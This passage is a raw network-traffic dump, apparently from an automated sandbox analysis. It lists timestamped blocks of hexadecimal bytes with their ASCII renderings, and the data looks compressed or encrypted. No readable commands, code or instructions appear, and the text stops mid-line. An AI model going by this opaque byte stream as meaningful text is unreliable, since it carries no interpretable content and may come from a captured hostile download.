                                                                                              2021-12-07 12:39:07 UTC1109INData Raw: 5b b1 c7 8c 69 cf 4c a3 f2 36 17 b1 c2 90 3d a4 60 b3 a2 74 89 3c a0 95 36 ae 0d e0 bf ea d4 58 71 e8 20 8e 4e ea 39 61 0d 93 7c cf 65 b5 d1 99 47 f0 6c 32 3a 7e dd 5e 04 e2 0c cb 48 2d 2f 77 db 7c 0f 1b 78 72 d5 09 6d 54 b0 02 dc 5a c1 c9 7a 97 99 28 e7 d2 5a 39 b3 46 03 00 ff 67 57 15 6f 60 fe 87 c2 14 f2 54 53 bf 64 9a 8f 22 3f 49 14 0c 81 45 03 3e 4c e5 19 66 ef 3a 63 01 99 9b 3d 49 7c 05 07 d5 c1 2b f1 e4 5e a3 6e 39 b2 f9 9a 57 72 9d ff 10 0e e0 9f 84 92 7f fa 49 e9 07 89 0b a1 fb e2 dd 65 0e 20 7e 1a 81 37 28 40 05 7b 00 fc c7 57 e7 ca 99 81 b5 03 fa a1 7b 5f 97 d1 ca 47 41 2b c4 da 71 f8 ae 62 9b 9f 25 8b da 4c c2 2a c6 32 08 48 ac aa 54 18 9d 87 b4 73 81 73 22 ed b2 8f 9e f4 72 4e 9e 71 51 8b fc 9c 54 32 68 f3 b5 d4 31 e1 90 08 63 36 55 db 44 1b
                                                                                              Data Ascii: [iL6=`t<6Xq N9a|eGl2:~^H-/w|xrmTZz(Z9FgWo`TSd"?IE>Lf:c=I|+^n9WrIe ~7(@{W{_GA+qb%L*2HTss"rNqQT2h1c6UD
                                                                                              2021-12-07 12:39:07 UTC1117INData Raw: b5 37 4a 37 12 98 c5 2c 8a bf d2 15 b3 ac 5e ee b3 4c 47 68 1b b7 e1 c4 19 83 4b 75 e5 a4 cf a4 ee 46 70 05 03 fa 37 73 dd 03 6f 79 f0 c5 4d db 89 52 77 ee 35 05 a6 6a 85 cf 48 83 da 53 40 83 ba 11 d4 fa 53 4b ff 2a 39 61 8e bb dc 52 a7 b8 ae 45 d8 ad e0 59 97 00 a2 17 da db 6e 75 9f 5b 41 68 dd 44 4f f9 f0 57 ec 3f 05 3c 1a 15 b8 f2 ef 55 81 ff 92 69 34 da 38 49 2e 68 76 6d 6b d2 bd df c3 43 79 76 06 0f 2e c1 fd 92 31 66 34 ec 18 28 69 2d 9d a2 e9 c0 3d 1b 3f 05 09 b4 d6 77 5f 44 d7 48 01 fe bf 31 25 fe 9e 96 a6 98 0e e4 cb f0 ea c6 e6 71 6a 6c 6b 13 29 87 88 4c a5 50 8c 86 5a be 72 a3 fa cf 23 db ba 1e 54 63 58 11 17 29 ba 54 d2 42 de 44 20 97 d7 ea c0 f6 dd 04 f3 be 25 ec ce be 28 69 91 2e f8 93 b1 8c ed f9 bb 32 f3 a7 84 c7 97 1e f5 bb ff e2 9f 0d 8a
                                                                                              Data Ascii: 7J7,^LGhKuFp7soyMRw5jHS@SK*9aREYnu[AhDOW?<Ui48I.hvmkCyv.1f4(i-=?w_DH1%qjlk)LPZr#TcX)TBD %(i.2
                                                                                              2021-12-07 12:39:07 UTC1125INData Raw: b0 36 78 a8 85 04 93 80 ff c3 99 a3 b6 03 c7 03 38 7f e7 fc 9a 1d 8e e8 be 68 3b 65 71 54 91 6c c5 16 80 ff 46 ed b5 18 2f 65 a1 a8 a1 14 e7 00 ee bf 55 73 80 ff 36 0c 7f 8d a7 60 b6 00 f0 3f 14 16 c9 02 af f6 bc 6e 6d 77 d7 c3 34 0b 0a 35 6a 32 26 3c a3 2e a4 ad 94 29 91 bc 11 2f 13 ce c3 35 dd 8c 82 1e ce 8d bf 4a 83 c4 9f f5 33 7c 0a 02 bd 14 19 51 b3 99 78 b5 26 b2 e1 9e 0b 78 d1 af ee 56 ba ff 3d a4 4e d4 ad 79 58 f7 f2 fc d1 c9 60 7a 58 df 09 00 f4 1f 87 aa ae 98 b5 a4 ac 0d 56 5a 97 40 fe 55 e3 8f 8f fc 5f e2 04 13 7c 90 6b 6e 74 b3 7e 8b e1 e7 48 22 4c 89 38 a4 9e 9c 17 a2 e1 6f d9 5e 44 d9 c8 98 32 5a 80 ff 55 71 2b 16 db 95 eb ea 5a ea 18 b9 7d b5 f5 11 14 97 4e 05 11 c9 5f b1 d7 66 84 fa 28 e5 19 84 ec 6c 6d b7 81 e7 bc 63 da ec 9a 40 6e d1 fb
                                                                                              Data Ascii: 6x8h;eqTlF/eUs6`?nmw45j2&<.)/5J3|Qx&xV=NyX`zXVZ@U_|knt~H"L8o^D2ZUq+Z}N_f(lmc@n
                                                                                              2021-12-07 12:39:07 UTC1133INData Raw: df 64 33 49 80 f9 1f f1 71 87 3d 60 e8 1d d8 7f 2b d3 60 7f 94 50 bc a0 4d 97 aa c5 b8 63 28 37 56 41 57 27 7f 10 4e 9c 75 60 ba 52 81 e5 9d 4b be 79 a5 88 c8 37 b4 0c e4 5f ea ec e1 4e 86 8f 5e 6c 62 f3 72 01 fb 7f 9e 97 65 94 6e 02 4b 9a b5 f7 d8 81 fa 3b be 9e 8a a2 4d 9b 2f 87 db 75 ed 05 05 7d 4f fd c8 7f cf 14 d2 8a 52 02 ce 1f a8 bf 33 89 b8 fd 34 75 f2 67 6f 5a 4f df f8 2f 2c f3 df 5a 89 89 53 71 15 4d 87 36 1f f9 0f 04 40 fe 83 99 e7 5f 89 e0 fc 8f f3 f7 47 a3 d7 33 30 ea fa a9 63 f0 4d 6a 52 32 5d d9 b2 3b bc 8b 70 0f 2c 67 bc 2c 41 fe a9 ed 15 2f e2 82 4c 08 c8 ff 48 0b 71 83 38 b9 78 24 5d 76 ff 61 97 cd 1d 9c 8d 5c 69 21 19 5d 79 8d 32 10 d4 52 33 c6 79 c2 44 e1 bd 2e 64 26 a5 eb 4c f6 93 6c 05 ee e7 58 9c 75 55 ad e4 92 a0 48 3a 32 b0 ff 77
                                                                                              Data Ascii: d3Iq=`+`PMc(7VAW'Nu`RKy7_N^lbrenK;M/u}OR34ugoZO/,ZSqM6@_G30cMjR2];p,g,A/LHq8x$]va\i!]y2R3yD.d&LlXuUH:2w
                                                                                              2021-12-07 12:39:07 UTC1141INData Raw: 8b ef 71 c6 b9 80 ce 15 86 bb d2 df b5 8b 71 e2 bf ef 3f ce ce b8 b2 03 f7 7f b4 f6 f3 04 da 94 f7 46 12 bf 7f 48 d5 96 f1 89 38 f6 c8 0f 33 17 cd f2 f6 92 8a d5 e2 86 a2 be 90 aa a7 e5 5d aa 5d da 64 ad db 28 c6 68 31 9f 3d 73 34 83 2f 12 db 4b e7 0f 6f 34 f4 9b c8 75 43 fd 7f 7f db 8a 77 fe cc 88 d0 cb d6 b3 52 7c db 41 2e ca 6f cb db 45 c8 47 09 d3 b2 86 7e 4f e1 fb 7f f7 d3 9b 26 33 a3 cd 8d 4b b3 2a 99 1b 66 cf f5 10 1b af 3f 60 0b ee 1a 53 b6 cc 54 bc 78 2e b2 6e 73 90 fc b1 00 33 3b bf fd fd 05 af fe e2 43 14 b1 f6 fb 33 0a ab ed c6 73 1e 1e d5 7b 34 5e ad fd 43 e7 96 f6 6b f2 d7 2f a5 28 06 ce cd 7e 5f b3 dd c3 6b 18 6a c2 4e 25 9b 84 4b a4 13 3b a0 d2 23 89 b6 83 ef 9f e0 fd 8b c8 27 46 0e 92 1e ba 79 cf 44 44 7d 67 41 ff 57 bb 77 cc 3b fd ea 54
                                                                                              Data Ascii: qq?FH83]]d(h1=s4/Ko4uCwR|A.oEG~O&3K*f?`STx.ns3;C3s{4^Ck/(~_kjN%K;#'FyDD}gAWw;T
                                                                                              2021-12-07 12:39:07 UTC1148INData Raw: 66 81 66 dd bf f5 3f af 6d 0a 49 ff d3 53 44 92 f4 3f d3 fd 44 44 b1 a0 20 2a 36 6e d3 20 31 27 ab 8f b0 46 40 86 1e 11 31 f6 cf ed 36 3f bf e5 4f d2 7f 3c 8e c3 b1 89 cf 69 62 25 c9 4c d0 9f b5 30 83 3f df 2c 61 ab 78 46 7a b9 92 74 a0 8e d4 ff 5b ff 5b f4 6d 93 f4 9f 70 b1 88 54 a8 09 8e a1 82 cd 55 cc e5 92 90 2f 79 0d ce 30 01 f8 29 81 bf 0e f4 0f 39 f0 bf 03 7e 35 d0 ff 47 81 bf 0a f8 31 a0 ff 57 81 5f 00 f8 89 fb bf 79 c0 6f 04 fc 0f 21 ff 7d 06 fe 83 c0 1f 02 fa df 1e f8 15 80 df 1d f8 b9 80 ff 06 f0 d3 81 fe 59 86 fc 8f 80 f8 f7 82 fa e7 13 d4 3f fb 81 ff 3b d4 3f 57 20 ff 33 42 fd 93 06 e7 9f 21 f0 9f 84 f3 8f b8 ff a5 06 f5 8f 1d f0 67 40 fd 23 09 f9 2f 1b ec 8f 84 fa 87 0f f4 af 34 d4 3f e5 10 ff 67 a0 fe 99 05 7e 0d b0 bf 38 9c 7f 1c 60 7f 1d
                                                                                              Data Ascii: ff?mISD?DD *6n 1'F@16?O<ib%L0?,axFzt[[mpTU/y0)9~5G1W_yo!}Y?;?W 3B!g@#/4?g~8`
                                                                                              2021-12-07 12:39:07 UTC1156INData Raw: 50 01 7f e5 3b 84 96 3a f0 2b e7 13 a8 9d 81 9f 23 26 2a a8 18 f8 6f d7 51 30 49 01 bf b0 99 be f6 47 e0 3f 1b d2 28 3d 0a fc 22 8e 23 b6 e5 c0 2f 4a db d8 dd 09 fc 5e 60 7f e2 fe c3 a5 0b 1d 1a df 81 df b3 99 57 f4 02 91 bf 4c c8 17 07 fc 57 c0 fe 8d c0 cf f9 3a 85 be 8f 38 ff e5 8b 94 c9 03 fe e9 c3 89 88 3c e0 3f f7 71 d3 20 1f f8 95 a8 09 48 79 e2 fc b7 b2 db 9c 0b f8 59 ee a0 fc 11 c0 4f 09 fc 3f 88 f3 ef 37 98 41 7b 22 ff dd 91 5e 79 e0 b7 8a d7 27 d3 02 fe 56 23 a9 d5 38 e0 0f d0 21 a0 9c 81 7f 3f 12 c7 90 0f fc 5e cf 84 7c 15 81 ff 18 c4 7f 36 f0 27 e8 28 eb d2 00 7f c9 8a 96 49 16 f0 c7 36 25 22 a6 80 5f d4 10 a1 75 11 f8 65 c7 08 d4 87 81 7f 8f 7b 54 50 1c f0 f3 02 3f 2b f0 bb f7 eb 6b 73 00 7f 59 65 a3 b4 0e f0 f3 2c 8e d8 ee 02 bf d4 a7 c6 6e
                                                                                              Data Ascii: P;:+#&*oQ0IG?(="#/J^`WLW:8<?q HyYO?7A{"^y'V#8!?^|6'(I6%"_ue{TP?+ksYe,n
                                                                                              2021-12-07 12:39:07 UTC1164INData Raw: d8 12 bb 15 24 3a f8 7c 25 f9 43 7a df 4e 8b 78 27 ed e9 ce d1 df f6 0f ea 34 c7 ca cf b1 f4 06 0f fd 64 a5 ca 6b 2f eb a7 75 68 b7 53 8a c5 76 56 fe 6f 75 ff 79 62 69 04 ad b0 81 b2 ef c4 0d a3 b7 65 54 eb 0a f4 94 bd 57 7d 2e 8f dd 8a bc f2 db ff 4b 28 d9 b7 d4 2e 15 0f 1b 59 ff ba bd 70 4e ff 6e 1e 2d 0e 31 4d f3 90 51 78 f6 7f f3 fb df 19 e6 0a bf 68 c6 20 33 82 be 27 da 4b dd 5c 9c 56 a2 9e 6e b0 16 94 bd bf c4 ff db fe 73 86 d6 bb 54 e4 c3 fc 73 67 a4 16 a9 b4 5b d6 39 0d 1d e2 71 0f 38 cc 92 8a ff f7 e0 df b5 d9 89 a0 75 70 9a df 55 4e 59 9d 3c 52 fa f1 c2 54 e7 2b fd f0 ce b3 c6 b1 bf f9 65 1f 7a d3 47 d3 ff 8a 0c d5 ac dd dd 0c 6f bf 7c c8 e0 97 e9 a1 57 5c c5 b1 21 ff df c4 ef b6 d7 83 c4 1f 92 24 e4 bb f6 87 9f f6 5f f8 2f ff 0f fc be 27 2d ff
                                                                                              Data Ascii: $:|%CzNx'4dk/uhSvVouybieTW}.K(.YpNn-1MQxh 3'K\VnsTsg[9q8upUNY<RT+ezGo|W\!$_/'-
                                                                                              2021-12-07 12:39:07 UTC1172INData Raw: 7a 59 46 ce 2a a2 49 c8 06 e8 ff b8 68 24 8b 59 47 6b 33 a4 a3 0d 25 e2 68 ce 97 d6 1d bd 48 d6 83 b7 b5 fd 09 fd ff c4 9d 9b ba 7b 47 cd a1 fe 31 5a 14 59 9c 81 fc 57 e0 b5 37 7e d3 b5 12 fa 5f b9 a6 d0 ff 9c 9f 84 f9 cf cb b9 cb 9f e5 57 d4 40 ff 79 fd ea bc 75 12 f8 53 de b5 2f 13 ed 5f 09 f6 af 97 ff c4 3b c7 b5 b2 50 77 f6 85 42 9e 5d 3f 92 6c 0d e6 bf 63 af d4 e7 19 a0 e0 01 fd 77 31 79 08 ce ff b0 ab a0 ff 2f 36 5e e1 12 3b a4 4b 7e e1 e6 2b 88 ff 7d d9 ec d0 ff 2c a6 34 74 90 60 11 4e c5 6c 8a c5 08 8d 0c 34 92 91 fc ff bd a0 fa 3b 46 f9 2c f9 ed 46 2e d0 bf 27 d3 e9 68 3b ba f5 65 d8 6b cd ee 41 ff 73 c1 49 97 8b 0e fa 3f bc 52 5b fe e9 f0 fe 43 8d 07 d5 cd 13 99 f7 7f 1c 84 f9 cf 1e 83 ec 98 3b 35 e3 45 0d 31 12 9e 83 b2 77 a2 e0 fd 97 d3 1d 91
                                                                                              Data Ascii: zYF*Ih$YGk3%hH{G1ZYW7~_W@yuS/_;PwB]?lcw1y/6^;K~+},4t`Nl4;F,F.'h;ekAsI?R[C;5E1w
                                                                                              2021-12-07 12:39:07 UTC1180INData Raw: cf 0d e1 18 52 5a 6c 7f cd ca 01 e2 7f bd 56 38 88 7f b3 8f 41 ff 77 f1 10 e3 b5 5b 04 0d c0 ff e7 fb 00 ff 77 d1 24 6d 01 f2 ff b2 36 c0 7f 0a 64 86 02 b1 35 4a 9f 39 4b 03 ff 5f ec c3 ff 7f f5 31 74 f0 fe 6f 6a 8d c0 fc 23 62 13 c0 3f 1e a5 a5 17 0f 42 19 de a8 4e 4c f4 31 40 01 fe e1 35 3e 99 86 e0 24 cb 08 ec 97 3a 01 f6 bf 8a 83 eb df b4 e7 0c 18 24 92 b7 b6 01 fe cb 58 32 40 09 f8 4f a3 85 48 4d cd d8 1d 9d 35 c6 ce 5f 6f 94 d8 bc 05 3d 11 7b d7 64 c1 d1 20 de 2b 80 7f 0a 06 3f 9b 49 bc c3 3f fd 8a c7 e2 d8 57 c7 0e df 82 f9 a7 94 c4 e0 a8 92 d9 77 28 cb 14 3b 4c b1 d0 91 46 78 ff ab 05 8f 7f 85 f0 f8 37 f0 99 1c e0 7f ff e4 7f 51 c8 dc eb e8 65 b2 bb fc 4f 4f 7d 24 f8 f3 6f fd d3 1d c0 41 7e 60 f4 42 d4 6a 63 33 85 3c 2e 4d b1 26 e5 2d c0 3f e0 ef
                                                                                              Data Ascii: RZlV8Aw[w$m6d5J9K_1toj#b?BNL1@5>$:$X2@OHM5_o={d +?I?Ww(;LFx7QeOO}$oA~`Bjc3<.M&-?
                                                                                              2021-12-07 12:39:07 UTC1187INData Raw: fb 27 f7 9c 40 ff 1f 0c fa 1f 08 fc fe c5 3d 49 f3 75 80 ff ce ff fb fe 07 de bf ee bf 40 00 fe 2b f2 f7 fe cb 0c 32 e3 c7 7f df ff 00 f8 6f fa df fb 17 b3 ff 71 ff e5 83 32 b8 7f 03 bf ff 82 27 33 61 a4 fa bf b8 ff 42 82 73 b7 ff 9d ad 6e 1a 92 f1 7f e5 fe 4b 60 2d de d1 7f dc 7f b1 1a 65 42 fd fd 1f f7 5f 64 07 ac 92 5d 81 fd 59 e5 a0 fe 0d 02 fb 2f 7c 40 ff f7 f2 bf ef bf 58 04 98 2e e2 a7 53 96 b3 02 fb 99 c1 fd 3b 88 04 b0 ff 10 d8 8f fb df f7 6f 3c 1a 16 0c 7e a0 58 26 77 b6 bd 1b f8 06 c7 bf fd 81 fd d9 e0 fe 47 cd 7f df bf 41 60 0c d6 fc df dd bf c1 f9 7b ff a6 18 f8 3f 4a 9b 33 a1 d7 d7 69 98 83 26 6d e0 fa ff c9 fb 37 08 2b e6 43 a0 fe 9f cc 97 27 c0 5b 2d fd 7b ff a3 6e cc 6f 7b 95 b7 ea 91 3e 29 b0 ff 69 b2 1f 7d 16 7a 3b 22 52 20 6e 1a e7 3d
                                                                                              Data Ascii: '@=Iu@+2oq2'3aBsnK`-eB_d]Y/|@X.S;o<~X&wGA`{?J3i&m7+C'[-{no{>)i}z;"R n=
                                                                                              2021-12-07 12:39:07 UTC1195INData Raw: 11 a9 92 1d 4a f5 69 78 b7 4e e5 de ab ec 45 0d 3c 17 6d b4 8e 41 0e c6 29 dc 60 ed 90 97 05 d0 12 fa a2 b6 0f ab aa de a3 83 b0 42 55 c3 35 22 79 4b 77 e8 d3 47 59 86 f1 78 6c e1 c8 a1 4e c3 cb cd 79 d3 73 83 6c 88 65 72 b4 52 a9 3b 38 15 07 9f 12 7e 9a 94 4f 6f 2a b7 56 af d3 76 fe fa 44 89 45 70 bd 8f 2b 32 30 cd a3 49 d7 c8 96 04 35 ea b5 ff a5 c8 e6 c4 cc 8c a9 bf 6c 8c 6c 83 9c 6a 1c e1 5f 7c 3a 7b a6 c5 cd 96 86 7c 73 a1 f0 c0 d4 2f 84 b5 16 f3 c5 2c 47 e0 97 19 ce df 7e f4 cf c1 b4 e9 0b 66 ea b4 93 fb 0f f3 1c 6b 7f c7 a6 7f ad 9c 26 97 21 12 1d 52 e2 fd 13 2b 98 f4 48 f3 ab 86 77 3c 83 e9 3a 2a ec 19 ce c4 f1 53 bb fb b9 73 4c db b9 25 19 56 a6 56 e6 df d7 1a f9 0e ec 8f c6 dc 72 2f 67 56 1e 9b 55 df 54 9a 25 cc 37 4d e9 fd 02 f5 bf 48 c7 02 01
                                                                                              Data Ascii: JixNE<mA)`BU5"yKwGYxlNyslerR;8~Oo*VvDEp+20I5llj_|:{|s/,G~fk&!R+Hw<:*SsL%VVr/gVUT%7MH
                                                                                              2021-12-07 12:39:07 UTC1203INData Raw: cc 65 be 7b 38 f3 58 36 06 3d 58 86 c6 ae f0 9e ea 49 67 d5 79 19 48 84 32 9f 85 fc b0 c2 b4 d9 a1 71 21 30 42 7a c7 ca d4 e3 e0 da 44 23 ee 51 5b d2 aa e1 08 f4 3f e5 73 63 49 d1 b8 dd cf 0f ab e9 82 79 87 30 c0 bc ca a3 20 6c b4 ae ec 0c 7b bf 12 a9 08 d9 92 8e 70 fe d9 df 1d 68 ec e9 df 8f d6 20 08 f5 59 b4 ab a6 82 d6 df f2 7a a5 b5 fb cd 34 54 b8 de 73 39 ff f0 63 fa 83 e7 e3 e7 84 e0 17 24 bb 7a bc 31 56 b1 6f 85 1c f2 d6 24 a3 22 49 3d 8d 5e ab ed 73 be 1b 12 d7 27 26 7d 06 c6 52 41 61 ca cf 0f a8 b8 1e e1 66 fa 1f 0c f9 5b b3 18 27 ba 94 c6 49 ad e6 bb 73 dc de 4b e6 33 6d 18 bd fc a7 fe 5b 4d 94 4c 11 eb 23 d4 a0 4f 37 49 da 73 32 21 57 98 ae d0 2c 7a c5 61 5a 1f 9d 50 f1 31 f5 cc 46 64 be 91 66 3d ab 70 20 28 07 c1 c1 63 2f e9 b2 ca ac a7 37 cf
                                                                                              Data Ascii: e{8X6=XIgyH2q!0BzD#Q[?scIy0 l{ph Yz4Ts9c$z1Vo$"I=^s'&}RAaf['IsK3m[ML#O7Is2!W,zaZP1Fdf=p (c/7
                                                                                              2021-12-07 12:39:07 UTC1211INData Raw: 78 08 78 5f 5f dd 22 6a 0d 1c 83 fc 4f 47 f7 d6 9c d7 f0 ac c5 8a a3 cb df 88 64 3f f3 f2 9b fc a2 86 02 c8 ee fe fb 2f 29 ec 1d 98 58 5e 32 d5 17 53 34 51 48 79 95 9d 65 4e 60 fe 65 b0 f7 14 99 f9 8d 8d 7e 2e 19 79 e6 42 57 70 d8 3a 13 86 90 bf fb ed 9e 39 05 09 45 3e 17 5d 5c 9f e1 cb b7 bb de 03 9b 09 55 6e a4 64 90 d7 68 a0 f3 49 40 e4 fc c7 00 5b 34 67 11 a5 1a f8 cf 2b ab b4 a7 55 af c8 a2 67 7a 3b fd 89 df 5f 75 f1 b7 67 97 cd 7d 3c ce 24 9b 1b ec ae 7e 90 3b 40 b6 15 72 42 fc 5a 15 82 3e 40 5b 39 a1 5a 41 31 0b de ff 2f f3 8d a3 2f 46 3c 3d ac de 35 82 ff bf 63 dd 34 6f 8f 74 f7 aa 62 25 aa 8b 7e c3 27 a7 9e 49 37 54 47 99 9c ac ea 40 4b 40 79 e0 47 0e 17 d5 a8 52 c6 a6 ff 80 71 08 52 eb 80 a3 ce af 90 8b ad e6 8b 5f dc e0 fc b3 44 01 f8 57 74 2c
                                                                                              Data Ascii: xx__"jOGd?/)X^2S4QHyeN`e~.yBWp:9E>]\UndhI@[4g+Ugz;_ug}<$~;@rBZ>@[9ZA1//F<=5c4otb%~'I7TG@K@yGRqR_DWt,
                                                                                              2021-12-07 12:39:07 UTC1219INData Raw: 86 1a 4c be cf 7b 5b 58 50 5d 55 68 59 e2 59 3c 91 60 c2 b1 57 0b 35 e5 a7 0c 9a 95 cf 48 c0 f3 ac 61 96 9c 05 7e b6 39 f1 67 2d 6b 0c b6 f9 91 a3 8a ab f0 77 3a 97 e6 80 b7 b1 b8 58 a2 5f fc fa cd be d8 0a 2f 5a 26 5f 86 75 39 85 7e e0 80 15 ab d3 6b 99 88 d8 d1 61 56 a2 dd 6f f5 5a 3c 93 55 d8 f8 0e 37 60 fe 5d 56 a3 a3 16 86 51 19 e4 3f ea 0e f4 82 7f f1 96 85 83 ef bf 48 71 ef e4 71 e8 92 7f 4e 51 75 e4 7b 19 dc c6 48 f4 5c 93 98 56 01 f7 aa 61 75 4d 33 bc 07 ea 2b 0b ac fc 9d c8 e5 d6 da c7 9d 5b af 7b bd a3 ab cc 1b 28 8a 98 19 c7 e5 bd 20 e0 3f 2c 72 4d 32 97 f1 d2 fc dd 34 2a 31 d9 26 2b 07 fc 63 c0 ff 1d 74 fd b1 1b 52 f3 1e b1 d3 35 bd 3b 86 00 d7 81 c3 73 eb 8e 00 f0 ff 9d 59 45 29 26 b4 4f c3 7a dc 61 29 48 9d 79 81 ff 07 3d 01 df 0f 0f ff 0f
                                                                                              Data Ascii: L{[XP]UhYY<`W5Ha~9g-kw:X_/Z&_u9~kaVoZ<U7`]VQ?HqqNQu{H\VauM3+[{( ?,rM24*1&+ctR5;sYE)&Oza)Hy=
                                                                                              2021-12-07 12:39:07 UTC1227INData Raw: 8c 9a ef 26 66 1a 05 f5 1f a1 a7 43 15 a5 07 35 29 51 8f 16 d5 2a c5 35 ca af 86 4e a4 41 f1 1a fd 74 2a 5f 19 4b c5 09 6e 4a 2a 28 92 c9 7f 51 33 26 f3 ee a4 63 47 0b 4e d9 1e b7 81 fc eb d6 3b 5d 16 93 73 8c b7 b2 7f d4 6d 42 5e 44 35 90 31 c1 80 f9 f7 ba 6b 4c d4 0d 2b 4d 9c 29 39 b9 fb 64 0d af a5 fc 9e 6b 66 97 e3 2e fd 6d 54 39 47 da 66 73 65 2b d3 85 9d c3 67 ff 33 fd dd 95 73 7c b8 e2 5e db 52 cd 78 07 69 a3 5e a0 a6 53 90 78 07 2a 0d c6 27 3e ce 21 25 4a 59 5e 5d b6 85 26 b5 85 40 38 e2 83 62 e6 3d 5e 47 9f a5 fb ac 05 9d b7 31 9e 2c 6b 7f c4 3b 2c 54 4c ac 9f f3 af 33 64 e0 fc f3 05 06 59 21 06 f8 cf 97 44 8d de 02 fe 8b 97 db 17 0f c7 4f c0 ff 83 df 3e d9 d3 8f e0 ca 66 b6 b6 72 de 53 ca c7 87 93 75 a7 2e d8 25 1b 8a f0 57 da 47 b1 f3 51 7c 0c
                                                                                              Data Ascii: &fC5)Q*5NAt*_KnJ*(Q3&cGN;]smB^D51kL+M)9dkf.mT9Gfse+g3s|^Rxi^Sx*'>!%JY^]&@8b=^G1,k;,TL3dY!DO>frSu.%WGQ|
                                                                                              2021-12-07 12:39:07 UTC1234INData Raw: 43 06 27 66 c0 fd 5f 33 36 e2 24 7a e0 bb ec 28 5d 18 5d c4 47 a8 52 2d cd db c4 19 90 ff ce 4b 27 b2 24 74 f5 f0 99 43 e1 43 fc b9 68 fd 26 06 ed 25 2d e0 ff 3c d1 22 79 f0 46 fc 7b a8 30 66 4c a0 65 42 f7 d0 7a f5 3b 64 9f 9c 32 38 a5 73 1a cd 92 c0 bb ea bc c2 c6 15 7e cc 22 19 47 ae ab 52 1b f8 cf c6 c9 35 da f0 62 06 cd f0 bf ff de 0d 45 b0 c3 e3 ff bb e2 7d 4a 6c 62 98 17 db 4e 23 17 c9 be 6a 26 f5 62 90 99 fb 24 ad e4 57 c1 4e e8 9a 82 f9 9a cd 57 66 79 bc 56 0a a3 5a a9 0d d5 53 94 85 1f 76 70 cd bf 5e d8 3d 69 0d 95 20 bb 51 d9 b6 8a 37 30 60 28 ac 20 21 aa b1 d3 5b 12 14 2c 3a b6 9c af 85 bd f4 8a 2e 63 d0 07 f7 5f 92 e3 6f fd ef 2c 09 50 96 ee df c8 7e 6b ca 59 7d 57 50 56 b7 1f c6 b5 9b 82 de cc 72 b6 96 27 bc 5f 31 cd 2d f0 01 96 0f e4 ff ab
                                                                                              Data Ascii: C'f_36$z(]]GR-K'$tCCh&%-<"yF{0fLeBz;d28s~"GR5bE}JlbN#j&b$WNWfyVZSvp^=i Q70`( ![,:.c_o,P~kY}WPVr'_1-
                                                                                              2021-12-07 12:39:07 UTC1242INData Raw: bf d5 e9 02 17 30 ed 54 d5 0c 6e 3a e3 f6 d5 21 42 39 8f 8a bd 6c 94 45 3e f6 45 46 98 b1 76 5a 0c 2e 98 a4 01 13 c4 e9 48 bb 92 fc ff cd 3f 5e 2b 61 6b 81 f3 3f 2d b6 ed d6 52 97 9e ac 5f 01 15 73 02 68 be 80 f3 4f 87 ad 66 f2 eb 08 8f e5 5d 70 ff 47 41 f5 28 b9 29 75 82 c8 d8 94 79 54 d9 dc 9e ca 24 fc 53 ff 7f a8 7a 0b b6 2c da 36 6c 17 01 91 ee 2e e9 4e e9 94 ee 6e 01 e9 ee ee ee 6e c9 9b ee ee ee 2e 11 51 91 4e e9 50 41 3a d7 c5 f3 7e df 5a db fa 09 c3 3d cc cc 75 9e c7 b1 ef 21 be 74 85 65 7b a0 ff b0 b7 bf 59 2d c8 fb f7 b5 e2 65 fe fa 1e d6 39 e8 ff 5f 4e 9c 6a e8 13 64 1e 6b 3d 92 df 3c 1e 94 45 b3 bf be b5 6a 01 fe 03 fd 5b c0 ff 78 b8 73 4b 69 38 be 02 fd 37 ee 1e 42 ca 1e e7 29 90 ff 5c 27 b3 70 3c cb 34 7a f9 fd f1 91 fa e4 7e 34 9c 1b 9e 70
                                                                                              Data Ascii: 0Tn:!B9lE>EFvZ.H?^+ak?-R_shOf]pGA()uyT$Sz,6l.Nnn.QNPA:~Z=u!te{Y-e9_Njdk=<Ej[xsKi87B)\'p<4z~4p
                                                                                              2021-12-07 12:39:07 UTC1250INData Raw: fd bf 0b 7c ce 00 b6 18 21 65 6e 6a e7 8f 28 30 fa 03 fc 37 77 6c 98 17 fe 9b 56 dd 99 a4 b1 e8 6b 6b 45 d9 37 a4 db 13 19 32 d9 5b 24 6e 30 73 06 e6 f4 67 e6 4b 1d 92 67 3c 3e e2 82 ce 4f 83 b4 4b 50 72 42 a6 16 1a 11 9c e0 f7 e7 e2 25 20 1c 7b 5a e4 11 ac a2 d2 97 d2 d1 4c d6 fc 85 cb 4a 0d fa 9f 5f dc 47 08 bd a2 a5 20 17 b1 01 20 ff a1 ab 13 ce 1a 4b 3f 82 58 ae ee ad ee 8e ed 35 08 e2 4e fc b6 3f 59 d3 1a b5 0e 12 22 8c 34 78 40 ff a7 3d d6 bb 66 9a 0f 6b 10 36 50 88 e4 b2 91 68 2b e6 b7 b1 e9 f5 a0 8c c0 f7 a5 3b f3 e2 3f 61 88 73 e3 6c 7e 7a 7e ef 5b 3d 84 3b 35 39 78 5a 1a a6 12 f2 19 e6 6b 2c 66 81 ff cb 85 b7 c5 6d ef 5e ee df db 3c 34 67 19 2b fb af ac 1d c3 16 39 aa f5 cb ff 30 68 53 f3 dd 30 a4 ff fc dc 5b f4 93 9d 87 8b 91 ce 57 4f 61 f4 4e
                                                                                              Data Ascii: |!enj(07wlVkkE72[$n0sgKg<>OKPrB% {ZLJ_G K?X5N?Y"4x@=fk6Ph+;?asl~z~[=;59xZk,fm^<4g+90hS0[WOaN
                                                                                              2021-12-07 12:39:07 UTC1258INData Raw: e7 60 41 ff 53 90 93 e5 e5 f9 57 a3 f0 cc 8e c9 60 17 71 5d c0 e4 9b 35 b5 df ba f0 92 7f d0 1e d5 08 5c cd 16 91 72 60 be 76 a2 0a ab 1c 6f 33 9f 3f a2 b8 75 cb 1a 39 7a 52 1a af 42 15 a0 fd 94 cc c3 93 21 83 8c f7 49 ab 69 71 69 23 a2 e0 20 89 14 2a c4 ee d7 62 6a 26 f7 be a9 20 da e5 2f cb 45 d3 f3 d0 e6 84 b3 b2 a1 72 8f 83 d4 6b c1 96 93 40 61 21 1c 77 a5 82 aa b4 85 ad d4 a9 a4 a2 91 4b ff e4 1a f0 ef eb ee 81 3e 5f 25 9c 4f 87 e2 a3 9c 09 db 1f 48 72 d9 cc eb b8 f1 9a d4 54 7d 53 2c bf 3f bd 0a 29 cb eb 0f 55 2a 34 ab 20 54 07 67 ca 3d 3c 25 fd a7 6a b1 24 d4 86 f2 2a b4 a4 4c 69 4f d4 a1 90 f3 96 34 bf 0c 5f f9 7f 9f 33 5c bd 04 fe be d1 59 fa e1 cd f0 2c a1 27 e0 d0 be b1 26 a0 87 66 b8 d1 95 d2 d1 85 